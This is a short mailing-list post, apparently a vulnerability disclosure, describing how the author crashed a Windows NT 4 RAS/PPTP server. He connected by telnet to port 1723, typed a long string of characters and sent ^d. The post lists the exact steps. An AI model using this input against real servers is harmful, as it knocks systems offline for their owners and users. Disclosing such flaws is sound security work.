RE Possible DOS in WinNT RAS (PPTP)

[simon () CONCEPTS CO NZ (Simon Helson)]

Hello again.

please excuse the lack of detail in my first posting. I was trying to
recollect the events of the past evening.

Unfortunately I don't have unlimited access to a NT server to play with.
However, I have tried this again (on the same server) this time over the
internet as opposed to a LAN. (trying to remove the NIC from the equation.)

Firstly, the NT setup:
NT Server Version 4, with Service Pack 4.0 applied.
(outside US version - only 40 bit)
PPTP added as a network device
Number of VPNs available - 2
then RAS service started.

The attack box setup:
RedHat Linux 5.2 running kernel 2.2.1
modem connection to the net

The procedure I followed:

[root@blobby /root]# telnet <removed for privacy> 1723
Trying <removed for privacy>...
Connected to <removed for privacy>.
Escape character is '^]'
hhhhhhhhhhhhhhh<type 256 times>
^d (not shown in output)
^]
telnet> close
Connection closed.

The instant I hit ^d his server rebooted. AFAIK there is nothing special in
the setup of the NT server.

I hope this clears up the picture.

Cheers

Simon